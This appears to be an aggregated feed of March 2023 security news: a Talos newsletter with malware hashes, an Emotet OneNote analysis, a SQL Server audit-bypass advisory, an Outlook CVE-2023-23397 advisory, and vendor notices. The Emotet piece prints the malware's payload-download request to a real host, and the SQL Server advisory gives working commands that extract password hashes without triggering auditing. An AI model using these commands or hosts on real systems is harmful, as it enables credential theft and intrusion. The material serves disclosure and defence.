The latest episode of ThreatWise TV from Hazel Burton is the closest look yet at the team Talos assembled in the days after Russia invaded Ukraine.

Thursday, March 16, 2023 14:03

Welcome to this week’s edition of the Threat Source newsletter.

We’re written a ton about Cisco Talos’ support of Ukraine and our friends and allies there. Now, we encourage you to watch and listen to the folks who have been working hands-on there.

The latest episode of ThreatWise TV from Hazel Burton is the closest look yet at the team Talos assembled in the days after Russia invaded Ukraine to help defend critical infrastructure, intelligence partners and government agencies in Ukraine. You can watch the full documentary above, or over on YouTube here.

**The one big thing**

We have new research out on a never-before-seen threat actor called YoroTrooper that’s carrying out a variety of espionage activity in Europe and Asia. This group has targeted several high-profile government organizations, including one in the European Union, stealing sensitive information such as login credentials, browser histories and cookies, system information and screenshots.

**Why do I care?**

While YoroTrooper uses malware associated with other threat actors, such as PoetRAT and LodaRAT, we believe this is a new cluster of activity from an entirely new threat actor. YoroTrooper is clearly going after major targets and has already been successful, so everyone should be on the lookout for these attacks, but especially users and organizations in Commonwealth of Independent States (CIS) countries.

**So now what?**

YoroTrooper creates malicious domains and spoofs commonly visited URLs that look like they belong to government agencies in the targeted countries to host its malware. So any time you go to open an email attachment or click on a link in an email, triple check to make sure it’s really where you want to go, or that you can verify the sender. Additionally, the blog outlines a range of protections in Cisco Secure products that can defend and detect this group’s actions.

**Top security headlines of the week**

The APLHV ransomware cartel claims to have **successfully stolen data belonging to Amazon’s Ring smart home company.** The ransomware gang’s dark website threatened to leak the data earlier this week, though it showed no evidence of a successful attack. Ring said on Tuesday that it had “no indications that Ring has experienced a ransomware event.” ALPHV, which is known for the BlackCat malware, usually encrypts targets’ data and threatens to leak the stolen information if the victim does not pay the requested ransom payment. Politico also reported this week that Ring will openly share recorded footage with local law enforcement, even if the camera’s user declines to do so, sparking questions about who owns security footage on private property and whether users are compelled to share those recordings. (Vice, TechCrunch, Politico)

Sensitive information from D.C. Health Link — the online health insurance marketplace for Washington, D.C. — is **reportedly for sale on the dark web,** potentially affecting White House staff and members of Congress. An internal memo last week warned of a "significant data breach” that potentially exposed the personal information of thousands of federal employees and warned potential victims that their data may have been compromised. As many as 21 members from the U.S. House and Senate could be affected, all of whom get their insurance through the program. In all, 56,415 customers were affected, according to the exchange. (CBS News, Roll Call)

Microsoft **released its monthly security update Tuesday,** disclosing 83 vulnerabilities across the company’s hardware and software line, including two issues that are actively being exploited in the wild, continuing a trend of zero-days appearing in Patch Tuesdays over the past few months. Two of the vulnerabilities included in March’s security update have been exploited in the wild, according to Microsoft, including one critical issue. One of the zero-days included this month, CVE-2023-23397, is a privilege escalation vulnerability in Microsoft Outlook that could force a targeted device to connect to a remote URL and transmit the Windows account's Net-NTLMv2 hash to an adversary. To trigger this vulnerability, a user doesn’t even need to open the email or preview it, the vulnerability is triggered as soon as the email is retrieved by the targeted email server. (Cisco Talos, SecurityWeek)

**Can’t get enough Talos?**

*   Talos Takes Ep. #130: There’s not actually more spam during tax season, just different spam
*   Researcher Spotlight: How David Liebenberg went from never having opened Terminal to hunting international APTs
*   YoroTrooper cyberspies target CIS energy orgs, EU embassies
*   YoroTrooper Espionage Campaigns Target CIS, EU Countries
*   Updated Prometei botnet evades defenses, mines Monero

**Upcoming events where you can find Talos**

**WiCyS (March 16 - 18)**

Denver, CO

**RSA (April 24 - 27)**

San Francisco, CA

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name:** Gen:Variant.MSILHeracles.59885

Threat Source newsletter (March 16, 2023) — A deep dive into Talos' work in Ukraine

Proof of concept code for a critical Microsoft Outlook vulnerability for Windows that allows hackers to remotely steal hashed passwords by simply receiving an email.

Microsoft Outlook CVE-2023-23397 Proof Of Concept

Categories: Threat Intelligence
Emotet finally got the memo and added Microsoft OneNote lures.



(Read more...)




The post Emotet adopts Microsoft OneNote attachments appeared first on Malwarebytes Labs.

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet's turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%\\OneNote\\16.0\\NT\\0\\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn\[.\]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: \*/\*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%\\OneNote\\16.0\\NT\\0\\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Emotet adopts Microsoft OneNote attachments

Microsoft SQL Server 2014, 2016, 2017, 2019, and 2022 appears to ignore audit rules for sys.sysxlgns allowing an attacker with administrative permissions to extract password hashes under the radar. Microsoft told the researcher they are not willing to fix it but acknowledge it as a security problem.

Title: Microsoft SQL Server Password Hash Exposure  
Product:                   Database  
Manufacturer:              Microsoft   
Affected Version(s):       2012-2022  
Risk Level:                Medium  
CVE Reference:             N/A  
Author of Advisory:        Emad Al-Mousa

Overview:

SQL Server is a popular database system, and database systems are a vital backbone in IT infrastructure as different types of systems and applications will require back-end data-store (databsae system). Moreover, Password hashes for Local database accounts are restricted in terms of permission access and only system admins/ DBA's can access them. of course, attackers will attempt to access them to crack the hashes and access the database system for data exfiltration.

*****************************************  
Vulnerability Details:

The following exploit assumes attacker escalated his permission as admin, and he/she will be able extract the password hashes even though an audit is in-place. So, its an audit by pass vulnerability.

currently, SQL Server password hashes are stored in two tables:

sys.sql_logins ----> visible table and auditing can be configured against it

 sys.sysxlgns  -----> invisible table and requires special access mode and audit rule is not functional !

*****************************************  
Proof of Concept (PoC):

I will simulate a way to extract password hashes in a stealthy way (auditing will not capture it), in the following PoC the account is called dodo:

Accessing windows server as administrator, open CMD session using the following command:

sqlcmd -S localhost\MSSQL2019 -A -E

USE [master]

GO

select name,pwdhash from sys.sysxlgns where name='dodo';

GO

The password hashes for account “dodo” will be displayed.

Let us create an audit rule using this method to capture “select” statements executed against sys.sysxlgns :

I will create a server-level audit to push audit logs as “binary file”:

USE [master]  
GO  
CREATE SERVER AUDIT [Audit-2020-SYSTEM-TABLE]  
TO FILE  
( FILEPATH = N’D:\mssq_audit\’  
,MAXSIZE = 0 MB  
,MAX_ROLLOVER_FILES = 2147483647  
,RESERVE_DISK_SPACE = OFF  
)  
WITH  
( QUEUE_DELAY = 1000  
,ON_FAILURE = CONTINUE  
,AUDIT_GUID = ‘0333dfad-260b-45a4-8302-d7eb94c14cdc’  
)  
ALTER SERVER AUDIT [Audit-2020-SYSTEM-TABLE] WITH (STATE = ON)  
GO

Then, I will define a database level audit under “MASTER” database to audit SELECT statement by any user/account against the system table sys.sysxlgns as follows:

sqlcmd -S localhost\MSSQL2019 -A -E

USE [master]

GO

CREATE DATABASE AUDIT SPECIFICATION [audit-systemtable]

FOR SERVER AUDIT [Audit-2020-SYSTEM-TABLE]

ADD (SELECT ON OBJECT::[sys].[sysxlgns] BY [public])

WITH (STATE = ON)

GO

The audit specification will be successfully created and can be visibly seen in SQL Server management studio.

Now you attempt to execute select statement again:

sqlcmd -S localhost\MSSQL2019 -A -E

USE [master]

GO

select name,pwdhash from sys.sysxlgns where name='dodo';

GO

- checking audit logs.....nothing is recorded !

Conclustion:

Super users and admin accounts must be monitored/audited for real-time monitoring for threat detection, and for future forensic analysis !

*****************************************  
- Defensive Techniques:

configure Operating System Security auditing and Monitoring.  
Network Segmentation and Firewall.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://databasesecurityninja.wordpress.com/2020/06/02/extract-sql-server-database-password-hashes-without-a-trace/  
https://learn.microsoft.com/en-us/sql/relational-databases/system-tables/system-base-tables?view=sql-server-ver16

Microsoft SQL Server 2014 / 2016 / 2017 / 2019 / 2022 Audit Logging Failure

The cryptojacking group known as TeamTNT is suspected to be behind a previously undiscovered strain of malware used to mine Monero cryptocurrency on compromised systems.
That's according to Cado Security, which found the sample after Sysdig detailed a sophisticated attack known as SCARLETEEL aimed at containerized environments to ultimately steal proprietary data and software.
Specifically, the

Cryptojacking / Cyber Attack

The cryptojacking group known as **TeamTNT** is suspected to be behind a previously undiscovered strain of malware used to mine Monero cryptocurrency on compromised systems.

That's according to Cado Security, which found the sample after Sysdig detailed a sophisticated attack known as SCARLETEEL aimed at containerized environments to ultimately steal proprietary data and software.

Specifically, the early phase of the attack chain involved the use of a cryptocurrency miner, which the cloud security firm suspected was deployed as a decoy to conceal the detection of data exfiltration.

The artifact – uploaded to VirusTotal late last month – "bear\[s\] several syntactic and semantic similarities to prior TeamTNT payloads, and includes a wallet ID that has previously been attributed to them," a new analysis from Cado Security has revealed.

TeamTNT, active since at least 2019, has been documented to repeatedly strike cloud and container environments to deploy cryptocurrency miners. It's also known to unleash a crypto mining worm capable of stealing AWS credentials.

While the threat actor willingly shut down their operations in November 2021, cloud security firm Aqua disclosed in September 2022 a fresh set of attacks mounted by the group targeting misconfigured Docker and Redis instances.

That said, there are also indications that rival crews such as WatchDog might be mimicking TeamTNT's tactics, techniques, and procedures (TTPs) to foil attribution efforts.

Another activity cluster of note is Kiss-a-dog, which also relies on tools and command-and-control (C2) infrastructure previously associated with TeamTNT to mine cryptocurrency.

There is no concrete evidence to tie the new malware to the SCARLETEEL attack. But Cado Security pointed out that the sample surfaced around the same time the latter was reported, raising the possibility that this could be the "decoy" miner that was installed.

The shell script, for its part, takes preparatory steps to reconfigure resource hard limits, prevent command history logging, accept all ingress or egress traffic, enumerate hardware resources, and even clean up prior compromises before commencing the activity.

Like other TeamTNT-linked attacks, the malicious payload also leverages a technique referred to as dynamic linker hijacking to cloak the miner process via a shared object executable called libprocesshider that uses the LD\_PRELOAD environment variable.

Persistence is achieved by three different means, one of which modifies the .profile file, to ensure that the miner continues to run across system reboots.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

The findings come as another crypto miner group dubbed the 8220 Gang has been observed using a crypter called ScrubCrypt to carry out illicit cryptojacking operations.

What's more, unknown threat actors have been found targeting vulnerable Kubernetes container orchestrator infrastructure with exposed APIs to mine the Dero cryptocurrency, marking a shift from Monero.

Cybersecurity company Morphisec, last month, also shed light on an evasive malware campaign that leverages the ProxyShell vulnerabilities in Microsoft Exchange servers to drop a crypto miner strain codenamed ProxyShellMiner.

"Mining cryptocurrency on an organization's network can lead to system performance degradation, increased power consumption, equipment overheating, and can stop services," the researchers said. "It allows threat actors access for even more nefarious ends."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cryptojacking Group TeamTNT Suspected of Using Decoy Miner to Conceal Data Exfiltration

Multiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S.
The disclosure comes from a joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC).

Cyber Attack / Vulnerability

Multiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S.

The disclosure comes from a joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC).

"Exploitation of this vulnerability allowed malicious actors to successfully execute remote code on a federal civilian executive branch (FCEB) agency's Microsoft Internet Information Services (IIS) web server," the agencies said.

The indicators of compromise (IoCs) associated with the digital break-in were identified from November 2022 through early January 2023.

Tracked as CVE-2019-18935 (CVSS score: 9.8), the issue related to a .NET deserialization vulnerability affecting Progress Telerik UI for ASP.NET AJAX that, if left unpatched, could lead to remote code execution.

It's worth noting here that CVE-2019-18935 has previously found a place among some of the most commonly exploited vulnerabilities abused by various threat actors in 2020 and 2021.

CVE-2019-18935, in conjunction with CVE-2017-11317, has also been weaponized by a threat actor tracked as Praying Mantis (aka TG2021) to infiltrate the networks of public and private organizations in the U.S.

Last month, CISA also added CVE-2017-11357 – another remote code execution bug affecting Telerik UI – to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.

Threat actors are said to have leveraged the flaw to upload and execute malicious dynamic-link library (DLL) files masquerading as PNG images via the w3wp.exe process.

The DLL artifacts are designed to gather system information, load additional libraries, enumerate files and processes, and exfiltrate the data back to a remote server.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Another set of attacks, observed as early as August 2021 and likely mounted by a cybercriminal actor dubbed XE Group, entailed the use of aforementioned evasion techniques to sidestep detection.

These DLL files dropped and executed reverse (remote) shell utilities for unencrypted communications with a command-and-control domain to drop additional payloads, including an ASPX web shell for persistent backdoor access.

The web shell is equipped to "enumerate drives; to send, receive, and delete files; and to execute incoming commands" and "contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory."

To counter such attacks, it's recommended that organizations upgrade their instances of Telerik UI ASP.NET AJAX to the latest version, implement network segmentation, and enforce phishing-resistant multi-factor authentication for accounts that have privileged access.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Multiple Hacker Groups Exploit 3-Year-Old Vulnerability to Breach U.S. Federal Agency

In affected versions of Octopus Deploy it is possible for a user to introduce code via offline package creation

Summary

Command injection via offline package creation (CVE-2022-4009)

Advisory Number

2023-05

Discovery Date

24 Oct 2022

Patch Release Date

14 Nov 2022

Advisory Release Date

15 Mar 2023

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Low

CVE ID

CVE-2022-4009

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2023.1.9687 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a low rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible for a user to introduce code via offline package creation.

The versions of Octopus Server affected by this vulnerability are:

*   All 3.x.x versions after 3.0.19
*   All 4.x, 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions
*   All 2022.2.x versions before 2022.2.8552
*   All 2022.3.x versions before 2022.3.10750
*   All 2022.4.x versions before 2022.4.8319
*   All 2023.1.x versions before 2023.1.4189

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.2.8552
*   2022.3.10750
*   2022.4.8319
*   2023.1.4189

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2023.1.9687). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2023.1.9687):**

If you have feature version...

...then upgrade to this version

2018.x, 2019.x, 2020.x, 2021.x

2022.2.8552 or greater

2022.1.x

2022.2.8552 or greater

2022.2.x

2022.2.8552 or greater

2022.3.x

2022.3.10750 or greater

2022.4.x

2022.4.8319 or greater

2023.1.x

2023.1.4189 or greater

**Mitigation**

There is no known mitigation for CVE-2022-4009, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-4009: Security Advisory 2023-05

Cisco Talos is urging all users to update Microsoft Outlook after the discovery of a critical vulnerability, CVE-2023-23397, in the email client that attackers are actively exploiting in the wild.

Wednesday, March 15, 2023 19:03

Cisco Talos is urging all users to update Microsoft Outlook after the discovery of a critical vulnerability, CVE-2023-23397, in the email client that attackers are actively exploiting in the wild.

Microsoft released a patch for the privilege escalation vulnerability on Tuesday as part of its monthly security update. Along with the patch, Microsoft released a security advisory detailing the targeted, but limited attacks they saw leveraging this particular vulnerability.

Microsoft subsequently assessed that the activity was associated with Russian based actors and used in limited, targeted attacks against a small number of organizations. The Computer Emergency Response Team of Ukraine first reported the vulnerability to Microsoft.

CVE-2023-23397 does not affect non-Windows versions of Outlook such as apps for Android, iOS, Mac, as well as Outlook on the web and other Microsoft 365 services. However, the CVSS attack complexity is rated “Low”. An attacker can exploit this vulnerability simply by sending the victim a specially crafted email. The vulnerability is triggered when the Outlook client retrieves and processes the message. According to Microsoft, “This could lead to exploitation BEFORE the email is viewed in the Preview Pane.”

As of Wednesday evening, Kenna Security scored CVE-2023-23397 with a risk score of 74 out of 100 — higher than 99 percent of all the vulnerabilities it has scored. However, the risk score is expected to rise once proof-of-concept exploit code becomes available.

Users should implement the patch as soon as possible. Additionally, Talos has released Snort rules 61478 and 61479, and Snort 3 signature 300464 to detect the exploitation of this vulnerability.

**Vulnerability details**

CVE-2023-23397 affects all Microsoft Outlook products on the Windows operating system. It is a critical escalation of privilege vulnerability via NTLM credential theft. Attackers can create a specially crafted email message, calendar invite, or task containing the extended MAPI property “PidLidReminderFileParameter.”

The “PidLidReminderFileParameter” property specifies the “filename of the sound that a client should play when the reminder for that object becomes overdue.” Inside the PidLidReminderFileParameter property, the attacker specifies a Universal Naming Convention (UNC) path to an SMB share controlled by the attacker. This leads a vulnerable system to send the user’s Net-NTLMv2 hash to the attacker, which can then be used in NTLM Relay attacks against other systems.

**Mitigations**

The ideal course of action to address this vulnerability is to install the patch provided by Microsoft. If, for some reason, your organization cannot apply this particular patch, Microsoft also provided a few mitigation options including adding users to the Protected Users Security Group to prevent the use of NTLM as an authentication mechanism as well as blocking port TCP/445 outbound from your network to block the NTLM messages from leaving the network. For full details, see the advisory linked above.

Microsoft also released a script intended to help administrators audit their Exchange server for messaging items (mail, calendar and tasks) that have a PidLidReminderFileParameter property populated with a Universal Naming Convention (UNC) path.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Talos created the following Snort coverage for CVE-2023-23397  
SIDs:  
Snort 3: 300464  
Snort 2: 61478-61479

Threat Advisory: Microsoft Outlook privilege escalation vulnerability being exploited in the wild

Broken access control in Advanced Authentication versions prior to 6.4.1.1 and 6.3.7.2

March 2023

Advanced Authentication 6.4 Service Pack 1 Patch 1 includes enhancements, and resolves several previous issues.

Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure that our products meet all your needs. You can post feedback in the Advanced Authentication forum on NetIQ Communities, our online community that also includes product information, blogs, and links to helpful resources. You can also post or vote for the ideas of enhancement requests in the Ideas forum.

For more information about this release and the latest release notes, see the NetIQ Advanced Authentication Documentation page.

If you have suggestions for documentation improvements, click at the bottom of the specific page in the HTML version of the documentation posted at the NetIQ Advanced Authentication Documentation page.

**1.0 What’s New?**

Advanced Authentication 6.4 Service Pack 1 Patch 1 provides the following:

*   Enhancements
    
*   Security Improvement
    

**1.1 Enhancements**

Advanced Authentication 6.4 Service Pack 1 Patch 1 includes the following enhancements:

*   FIDO2 Improvements
    
*   Ability to Add Twilio Subaccounts in the SMS Sender Policy
    
*   An Option to Allow Third-Party Service Providers to Select the Chain for Any Client
    

**FIDO2 Improvements**

The following enhancements have been added to the FIDO2 method:

*   Ability to Enroll Resident Credentials
    
    The administrator can allow users to enroll the FIDO2 method and store the Resident Credentials (security key) on the FIDO2-compliant device (YubiKey). With Resident Credentials, users can experience seamless login without specifying their username and password.
    
*   Username-less Login Support
    
    Advanced Authentication extends the FIDO2 method to support the username-less authentication to the Web Authentication events. The enrolled FIDO2 card contains the username. When the user taps the card, the username is filled in the respective field automatically. To configure the username-less authentication, three options have been introduced in the FIDO2 method.
    
*   Ability to Disable the PIN Prompt
    
    Advanced Authentication facilitates the administrator to mandate or hide the PIN prompt when users enroll, test and authenticate with the FIDO2 method.
    
    For more information, see FIDO2 in the Advanced Authentication - Administration guide.
    

**Ability to Add Twilio Subaccounts in the SMS Sender Policy**

This release provides ability to add the subaccounts of Twilio Parent account. With subaccounts, you can add Country Codes based on the customer’s (SMS receivers) geographic location. The subaccounts distinguish the usage based on team, customer or product, and provides clear billing data. Also, allows resource (phone number) mapping.

For more information, see SMS Sender in the Advanced Authentication - Administration guide.

**An Option to Allow Third-Party Service Providers to Select the Chain for Any Client**

This release introduces the option in the policy to allow the third-party service providers to select a preferred chain for any client, such as Windows Client, Mac OS X Client, and Linux PAM Client workstation. Then, route users to the selected chain during authentication.

For more information, see Enabling the Client Chain Selection in the Advanced Authentication - Administration guide.

**1.2 Security Improvement**

Advanced Authentication 6.4 Service Pack 1 Patch 1 release addresses CVE-2023-24468.

**2.0 Resolved Issues**

This release includes the following software fixes:

Component

Description

Administration

When a user sets to in the policy, then the list in the does not display all the available chains.

Administration

On the , enrollment of the U2F method fails on the following browser:

*   Google Chrome
    
*   Microsoft Edge
    
*   Mozilla Firefox
    

Administration

The option is modified to in the policy.

Administration

The option is modified to in the method.

Smartphone

When a user tries to authenticate with the method, a prompt to specify the PIN (User Verification) is not displayed on the Android devices.

Smartphone

When a user attempts to authenticate with the NetIQ Advanced Authentication iOS smartphone application by using the facial recognition, the application does not identify the face and prompts the user to re-authenticate. Users are experiencing infinite authentication loop.

Smartphone

When a user sets the option to in the NetIQ Advanced Authentication iOS smartphone application settings for face recognition authentication. Later, the user is unable to set the option to .

Smartphone

When a user sets the smartphone language to Arabic, the NetIQ Advanced Authentication iOS smartphone application stops working.

Windows Client

While connecting to the remote desktop on the Windows Client, the Advanced Authentication Credential Provider does not display the chains that require Device Service for the elevated access.

**3.0 Upgrading**

You can directly upgrade to Advanced Authentication 6.4 Service Pack 1 Patch 1 from 6.4.1.

_NOTE:_The following is the recommended upgrade sequence:

1.  Advanced Authentication servers
    
2.  Plug-ins
    
3.  Client components
    
    Any change in the upgrade sequence is not supported.
    

_NOTE:_The RAM requirements of Advanced Authentication have been changed in 6.4 as follows:

*   Minimum: 8 GB per server.
    
*   Recommended: 12 GB per server
    

Before upgrading your Advanced Authentication cluster to 6.4, ensure that the environment complies with the new requirements.

For more information, see Advanced Authentication System Requirements.

**4.0 Known Issue**

Advanced Authentication 6.4 Service Pack 1 Patch 1 does not have any known issue.

**5.0 Contact Information**

Our goal is to provide documentation that meets your needs. If you have suggestions for improvements, please email Documentation-Feedback@netiq.com. We value your input and look forward to hearing from you.

For detailed contact information, see the Support Contact Information website.

For general corporate and product information, see the NetIQ Corporate website.

For interactive conversations with your peers and NetIQ experts, become an active member of our community. The NetIQ online community provides product information, useful links to helpful resources, blogs, and social media channels.

**6.0 Legal Notice**

© Copyright 2023 Micro Focus or one of its affiliates.

The only warranties for products and services of Micro Focus and its affiliates and licensors (“Micro Focus”) are as may be set forth in the express warranty statements accompanying such products and services. Nothing herein should be construed as constituting an additional warranty. Micro Focus shall not be liable for technical or editorial errors or omissions contained herein. The information contained herein is subject to change without notice.

For additional information, such as certification-related notices and trademarks, see https://www.microfocus.com/en-us/legal.

CVE-2023-24468: Advanced Authentication 6.4 Service Pack 1 Patch 1 Release Notes

Hornetsecurity research highlights that more than 1 in 4 companies have fallen victim to ransomware attacks, with 14.1% losing data and 6.6% paying a ransom.

**LONDON****,** **March 15, 2023** **/PRNewswire/ --** Global cybersecurity provider Hornetsecurity has today announced the launch of VM Backup V9 – the newest version of its award-winning virtual machine (VM) backup, replication and recovery solution.

This latest iteration offers ransomware protection leveraging immutable cloud storage on Wasabi and Amazon S3, with Microsoft Azure soon to follow. This new key feature enables customers to protect their backup data from ransomware by making their data tamper-proof for a defined period.

A recent Hornetsecurity study revealed that 15% of ransomware attacks specifically targeted backups, highlighting the essential need for immutable backups , which forms a key part of the V9 update.

Hornetsecurity CEO, Daniel Hofmann, said: "Data breaches and ransomware cost businesses millions of dollars every year. It's vital that organisations take preventative measures and are protected with the latest technology. We're excited to launch VM Backup V9, which provides reassurance to our customers and partners that their virtual machine data backups are protected against ransomware attacks. It also addresses the latest compliance regulations in data security and data protection."

**Ransomware protection**

Immutable Cloud Storage gives users ongoing access to their data without the need to pay a ransom if targeted by ransomware. This newest feature ensures that backup data becomes tamper-proof, as it cannot be modified or deleted by any user, including administrators and root users.

**Easy installation and newly overhauled backup repository**

VM Backup V9 has an easy-to-use, intuitive interface that gives individuals full control, allowing them to monitor and manage all Hyper-V and VMware VMs from a single console.

V9 can now handle larger infrastructure setups. Its overhauled backup repository optimises disk space, ensuring more robust long-term storage. In addition, background operations can now run in parallel with other ongoing backup and restore processes.

Hornetsecurity provides outstanding support 24 hours a day, 7 days a week, with a guaranteed call response time of less than 30 seconds.

**Learn more about Hornetsecurity's VM Backup V9** here.

**About Hornetsecurity**

Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organisations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates in more than 30 countries through its international distribution network of 8,000+ channel partners and MSPs. Its premium services are used by more than 50,000 customers.

Tag

#microsoft